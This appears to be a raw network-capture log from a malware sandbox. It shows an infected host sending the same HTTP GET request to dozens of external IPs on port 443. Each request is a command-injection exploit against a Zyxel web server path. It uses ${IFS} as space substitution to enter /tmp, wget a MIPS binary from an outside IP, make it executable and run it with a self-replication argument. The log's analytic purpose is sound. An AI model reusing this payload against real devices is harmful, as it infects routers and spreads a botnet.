                                                      Feb 2, 2024 06:36:03.864588022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7019192.168.2.145388281.39.15.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864614964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7020192.168.2.14568028.93.45.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864650011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7021192.168.2.14464348.250.210.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864708900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7022192.168.2.1453894111.207.115.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864736080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7023192.168.2.1438684107.190.156.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864768982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7024192.168.2.1439228131.179.8.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864799976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7025192.168.2.145455873.23.198.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864867926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7026192.168.2.14474022.39.213.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864875078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7027192.168.2.145574040.245.220.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864914894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7028192.168.2.144030250.195.87.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864983082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7029192.168.2.144031096.48.193.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865035057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7030192.168.2.1446074105.129.160.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865061998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7031192.168.2.1442026138.70.78.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865127087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7032192.168.2.1441660192.40.251.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865164042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7033192.168.2.1433208179.244.112.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865200996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7034192.168.2.1457844220.132.52.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865247011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7035192.168.2.145075687.54.95.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865281105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7036192.168.2.1448294145.246.50.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865309000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7037192.168.2.1446352129.230.170.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865360975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7038192.168.2.1450274158.95.253.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865444899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7039192.168.2.1449220205.140.61.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865473032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7040192.168.2.1446252195.182.79.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865520000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7041192.168.2.1459476145.77.244.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865569115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7042192.168.2.1436098165.127.238.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865602016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7043192.168.2.1450776172.235.68.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865642071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7044192.168.2.143971464.226.232.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865695953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7045192.168.2.143537886.35.63.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865736008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7046192.168.2.1433040130.122.125.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865778923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7047192.168.2.146076446.20.175.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865819931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7048192.168.2.144364679.6.54.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865848064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7049192.168.2.144824669.187.226.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865880966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7050192.168.2.144009657.0.182.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865923882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7051192.168.2.143799667.232.78.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865941048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7052192.168.2.144895893.157.201.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.865988970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7053192.168.2.143662819.5.226.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866038084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7054192.168.2.143342813.177.245.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866080046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7055192.168.2.1439984144.107.251.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866113901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7056192.168.2.1440450209.59.65.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866147995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7057192.168.2.1449632141.217.7.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866173983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7058192.168.2.1447310204.46.204.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866245031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7059192.168.2.1460552129.140.207.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866283894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7060192.168.2.1438358162.143.186.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866307974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7061192.168.2.1452936179.95.178.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866367102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7062192.168.2.145334288.2.91.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866403103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7063192.168.2.145571289.104.193.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866432905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7064192.168.2.144539479.227.218.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866468906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7065192.168.2.145831032.200.189.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866525888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7066192.168.2.1442846152.56.168.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866596937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7067192.168.2.143294068.253.117.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866626978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7068192.168.2.1439248169.188.98.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866661072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7069192.168.2.1441858132.203.184.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866709948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7070192.168.2.1456744129.170.212.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866761923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7071192.168.2.1460044110.27.224.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866806030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7072192.168.2.144133289.145.200.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866842031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7073192.168.2.1437708145.223.200.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866871119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7074192.168.2.1442366160.78.214.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866910934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7075192.168.2.1438734186.67.226.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866935968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7076192.168.2.1447888196.216.220.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866971016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7077192.168.2.1452908168.177.235.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.866996050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7078192.168.2.14329728.178.246.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867042065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7079192.168.2.144307420.72.215.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867088079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7080192.168.2.145631850.166.250.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.867122889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7081192.168.2.143714865.116.35.180443
                                                      TimestampBytes transferredDirectionData
